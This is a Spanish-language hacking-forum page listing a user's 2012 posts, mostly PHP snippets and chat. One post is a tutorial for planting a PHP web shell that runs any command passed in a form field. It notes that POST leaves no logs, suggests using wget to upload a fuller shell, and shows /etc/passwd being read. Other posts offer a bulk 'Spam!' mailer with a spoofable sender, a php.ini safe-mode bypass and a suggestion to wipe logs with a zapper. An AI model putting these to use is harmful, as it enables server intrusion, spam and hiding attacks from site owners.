Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Okol

#41
Pentesting / Creando un minibackdoor en PHP
Noviembre 24, 2012, 04:19:32 PM
 Hola amigos, hoy explicaré como backdorizar una web. Es decir como crear un archivo que ejecute comandos, ya sea en linux o windows (Depende que servidor sea).
Esto es más seguro ya que solo deja 1 log y si lo haces con metodo POST no deja logs. El codigo seria así:
Código: php

<form method="GET" action="lol.php">
<input type="text" name="comando">
<input type="submit" value="ejecutar">
<?php
if(isset($_GET['comando']));
{
$lol = @system($_GET['comando']);


echo $lol;
}
?>

En el formulario ponemos que comando ejecutar, asi tenemos control sobre el servidor y podemos ejecutar cualquier comando, si te da la gana usas wget (LINUX) y subes una shell y la borras, un claro ejemplo de como funciona seria este:



Explicaré un poco la función por la que nuestro Mini Backdoor trabaja:
System: Es una función que permite ejecutar comandos dentro de un servidor.

En la foto lo que hicé fue ejecutar el comando cat /etc/passwd y como pueden ver se ejecuto satisfactoriamente.

Otra cosa que podemos hacer es poner
Código: php
$lol = @system($_GET['comando']);

en algún archivo ejemplo index.php y llamar a la variable lol por url y ejecutar el comando un ejemplo seria You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

y ejecutaria lo que es el comando.
Agradecimientos: Oggy & HD_Breaker
Espero que les haya gustado.
Un saludo.
#42
Dudas y pedidos generales / Re:erro en php ayuda?
Noviembre 14, 2012, 01:08:33 PM
Puedes decir en que lineas te saca error?
#43
Muy buen reto :D
Lenguaje: PHP
Fotos:




Código: php
<form method="POST" action="edad.php">
Ingrese la edad de underc0de<input type="text" name="edad">
<input type="submit" value="Enviar"><br>

<?php
$edad=$_POST['edad'];
if(isset($_POST[edad]))
{
if($edad== 7+10-5-4-5)
{
echo'Correcto La edad es '.$edad.' a&ntilde;os';
}else{
echo 'Incorrecto!';
}
}
?>


Saludos!
#44
Muy buen aporte!
Me gusto mucho...
Me tomé la libertad de realizar un pequeño "Generador de contraseñas seguras"  En PHP
el codigo es:

Código: text
<?php
$fuente='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@#$?%&.,_-+';
$tamano = 10;
$pass = str_shuffle($fuente);
$pass = substr($pass,3,$tamano);

echo $pass;
?>

Añadiendole un pequeño Formulario y un par de cosillas quedaria bien...!
Saludos!
#45
Off Topic / Re:Que Musica Me Recomiendan Para Programar
Octubre 22, 2012, 01:15:47 AM
Disculpen me equivoqué de zona...
ya lo muevo no me  habia dado cuenta
#46
Off Topic / Que Musica Me Recomiendan Para Programar
Octubre 21, 2012, 11:15:03 PM
Hola pues como dice el titulo...
Ando buscando musica que no sea ni metal ni rock ni tampoco muy tranquila...
Uds saben algo que no te duerma pero que tampoco te distraiga!
Espero tengan algunas...
#47
Back-end / Underc0de Mailer [Basico]
Octubre 21, 2012, 05:36:48 PM
Hola amigos, me puse a programar un mailer para testear unas cosillas y pues esta muy basico...
Son 2 archivos, Bueno les dejo el source:

index.php:

Código: php
<head><title>Mailer</title>
<body bgcolor="black" text="gray">
<center><img src="http://underc0de.org/foro/Themes/insidv2/images/theme/logo.png"></center>

<CENTER><form method="post" action="enviar.php">
Desde:<input type="text"name="from"><br /><br />
Asunto<input type="text"name="asunto"><br /><br />
Numero De Mensajes<input type="text"name="num"><br /><br />
Para:<textarea name="para"></textarea><br>
[*]Si son varios mails separalos por coma...<br><br />
Contenido:<TEXTAREA name="cont"></TEXTAREA><br>
<center><input type="submit" value="Spam!"><br /></center>
</form></CENTER>
<center><font size="3" color="red">Powered By Okol | 2012</font></center>


Enviar.php:

Código: php
<center><img src="http://underc0de.org/foro/Themes/insidv2/images/theme/logo.png"></center>
<body bgcolor="black" text="red">

<?php
//Powered By Okol for Underc0de
//Greetz All friends
$desde = $_POST['from'];
$para= $_POST['para'];
$contenido= $_POST['cont'];
$asunto= $_POST['asunto'];
$numsj= $_POST['num'];
$lol=0;
while($lol < $numsj){
$lol=$lol + 1;
mail($para,$asunto,$contenido,'From:'.$desde);
                    }
if($para != '' && $asunto != '' && $contenido != '' && $desde != '' && $numsj != '')
{
echo'<center>Enviado Correctamente!<br>';

}else{
echo '<center>No se pudo enviar el mensaje, Todos los campos son obligatorios<br>';
}
echo 'Tu IP Es '.$_SERVER['REMOTE_ADDR']. 'Solo por seguridad...';
?>



Aclaracion: El mailer no manda codigo HTML porque testee con las headers pero no me enviava nada...

Si alguen puede arreglarlo se lo agradeceré
Saludos!!!
#48
Presentaciones y cumpleaños / Re:Presentación Luisz
Octubre 21, 2012, 04:55:16 PM
Hola bro....
Pues que mejor que tenerte por acá espero tu estancia sea buena (al igual que tu prima) Y compartas conocimientos al mismo tiempo que adquieras los mismos.

Un abrazo y sin mas que decir te digo:

BIENVENIDO!
#49
Hola, Lo puedes hacer como dice Q3rv0 o puedes usar html..
Seria asi
Código: text
<?php

            //Recibo las variables de formulario
            $nombre = $_POST['nombre'];
            $mail = $_POST['email'];
            $mensaje = $_POST['mensaje'];

            //Te muestro las variables

            echo "<h3>El mensaje que has enviado es: </h3>";
            echo "<br />";
            echo "<p>Nombre: ";
            echo "<br />";
            echo $nombre;
            echo "<br />";
            echo "Email: ";
            echo "<br />";
            echo $mail;
            echo "<br />";
            echo "Mensaje: ";
            echo "<br />";
            echo $mensaje;
            echo "</p>";

            //Envio un email
            $aquien ="[email protected]";
            $asunto = "Has recibido un correo de Only Labs";
            $mensajemail = $nombre." con el email: ".$mail." te ha enviado un mensaje: ";

            if(mail($aquien,$asunto,$mensaje,$mensajemail))
            {
               echo "Tu email se envio correctamente, en breve te respodneremos. Gracias</script><META HTTP-EQUIV='Refresh' CONTENT='0; URL=index.php'>";
                                       
            }
            else
            {
               echo "El envio del mail ha fallado, intentalo otra vez</script><META HTTP-EQUIV='Refresh' CONTENT='0; URL=formulario.php'>";
                                       
            }
            ?>
#50
Explicare como Conectarnos a un servidor y como seleccionar la base de datos para almacenar los mismos!
Empezamos:

¿Que servidor usaremos?

Yo usare localhost (En mi caso es Appserv) Pero pueden usar otros como xampp Bueno Después procederemos a Poner nuestra conección a el servidor así:

Código: php
<?php

$con=mysql_connect("Servidor","Usuario de el servidor","password")or die(mysql_error());//Conectando a el Servidor
/* En xampp user es root y no tiene password*/
?>


//La funcion or die(mysql_error()) Significa decir: Dime el error que tengo

//La funcion mysql_connect("","","") Dice: Conectate a este servidor por este usuario y por esta contraseña, Asi estamos conectados al servidor

Ok ya tenemos conectado al servidor
Ahora pasaremos a Seleccionar la base de datos con una linea asi:
Código: php
<?php
mysql_select_db('nombredb', $con);//Seleccionamos la Base de datos
?>


Bueno Pronto hare un tutorial sobre como almacenar datos en la DB Mientras tanto les recomiendo practicar
Saludos
By Okol
#51
Off Topic / Cuentanos tu motivacion para programar
Octubre 19, 2012, 12:18:52 AM
Hola bueno habro este post para que uds pongan cual es su motivacion para tener imaginacion y por lo tanto programar "Como dios manda"

Mi forma de imaginar es fumarme un porro y asi vienen 100 ideas para hacer los scripts mas locos y divertidos!

Espero haya mas movimiento en esta zona y todos cuenten cual es su motivacion

FOTO De mi Motivacion:



Saludos!!!
#52
Aqui te recivimos con gusto hermanazo!!!!
#53
Facil pero bueno, Sigue asi bro!! asi muchos van practicando
FELICIDADES!

EDIT: MUCHAS GRACIAS POR REVIVIR ESTA SECCIÓN BRO!!
#54
Back-end / Como juntar 2 imagenes en php
Octubre 07, 2012, 12:44:06 PM
Hola amigos de nuevo soy yo y pues sigo estudiando mas PHP y quiero compartirles esto
que le sera de ayuda almenos a uno.
Bueno se trata de juntar dos imagenes en PHP es algo sencillo y funcional :D
Como para dejar una marca de agua
Comenzamos!

Código: php
<?PHP
header("content-type: image/jpg");

$primera=imagecreatefromjpeg('yaoo.jpg');#Primera
$segunda=imagecreatefromjpeg('troll.jpg');#Segunda
//Asi se crean las dos imagenes que utilizaremos

#Una imagen sobre la otra
imagecopy($primera,$segunda,300,300,0,0,211,170); //<-- Cordenadas

#Damos Resultado...
imagejpeg($primera);

#Destruimos ambas!
imagedestroy($primera);
imagedestroy($segunda);


?>


Quedaria algo asi


Dudas ami MP.
Saludos.
#55
Dudas y pedidos generales / Re:Problema con Symlink!!
Septiembre 30, 2012, 10:04:45 PM
Exelente respuesta Q3rv0 tenia pensado hacer un videotuto.. pero igual gracias :D
#56
Dudas y pedidos generales / Re:Problema con Symlink!!
Septiembre 30, 2012, 06:29:02 PM
Pues mira investiga como hacer el symlink manual, Es demasiado facil si puedo mañana hago un tuto.. ;)

Saludos..!
#57
Dudas y pedidos generales / Re:Problema con Symlink!!
Septiembre 30, 2012, 04:46:44 PM
Hola antes que nada amigo, Bueno respecto a tu duda te recomiendo hacer el symlink manualmente, creo que habian posteado un tuto, Te sale ese mensaje porque la t00l esta programada para que busque especificamente en un directorio y al parecer cambiaron el nombre a ese directorio y por eso la tool no lo puede buscar, otra cosa podria ser que este safe mode on, trata de bypassearlo con php.ini

solo creas un archivo le pones php.ini y en el code pones Safe_Mode = off y listo!
Espero te haya servido
Un saludo!
#58
Bugs y Exploits / Re:Rootear Servidores Linux By Nort4x
Septiembre 10, 2012, 04:46:20 PM
Concuerdo con Xt3mp, nadie te deve recalcar que te enseño o no eso es crecerse ante losdemas
#59
Bugs y Exploits / Re:Como hacer una BackConect By Okol
Septiembre 10, 2012, 04:08:09 PM
Que tan dificil es usar un buen zapper y listo ._.
#60
Bugs y Exploits / Re:Como hacer una BackConect By Okol
Septiembre 09, 2012, 11:54:55 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
y la ip completamente visible en los logs xD
Esto no es un post donde enseño a dejar invisible la ip en los logs, Lee el titulo. SOLO ENSEÑA A HACER UNA BACKCONECT.